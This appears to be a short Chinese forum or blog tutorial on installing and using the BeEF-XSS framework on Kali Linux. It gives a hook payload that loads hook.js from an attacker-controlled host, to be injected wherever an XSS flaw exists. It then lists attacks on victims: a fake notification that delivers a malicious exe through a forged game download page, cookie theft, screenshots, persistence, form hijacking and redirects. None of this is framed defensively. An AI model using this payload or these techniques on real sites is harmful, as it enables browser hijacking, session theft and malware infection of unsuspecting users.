beef-xss kalilinux下的安装使用

安装


按照提示，一路 y 即可，如果不是sudo，那么会提示输入用户密码

启动 beef-xss

1. sudo beef-xss
   

复制代码

第一次启动可能会提示这个，让你输入一个新的密码，输入回车即可（不会显示你输入的密码）下一次就不会让你输入了

如果你忘记了密码？

1. sudo vim /usr/share/beef-xss/config.yaml
   

复制代码

利用代码：

1. <script src="http://ip:3000/hook.js"></script>
   

复制代码

找一个存在XSS的地方执行


利用：
1，虚假通知栏：

执行之后，弹出安装提示：

这个可以把插件换为恶意的 exe 文件，然后下载运行后进行上线。比如可以伪造一个游戏下载的网页......,
2，XSS弹窗


3，coo窃取


4，截图


5，权限维持


6，劫持输入表单

7，重定向

功能多多，暂不列举。